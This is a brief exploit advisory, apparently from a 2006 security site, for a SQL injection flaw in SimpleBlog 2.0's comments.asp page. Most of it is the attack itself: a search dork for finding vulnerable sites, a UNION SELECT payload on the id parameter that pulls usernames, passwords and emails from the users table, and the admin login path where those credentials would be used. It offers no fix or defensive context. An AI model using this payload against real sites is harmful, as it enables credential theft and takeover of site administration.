Rated as : High Risk
################################################################################
##
##
## SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit
##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
##
## Credit by | Chironex Fleckeri
##
## Mail | ChironeX.FleckeriX@Gmail.Com
##
## Googledork | Powered By SimpleBlog 2.0
##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
##
##
##
################################################################################
############################################################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT
ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS
WHERE id=1 #
############################################################################################################################################################
###########################################################
#Admin Panel : http://www.target.com/path/admin/login.asp #
########################################################### securitydot.net - 2006-08-20
|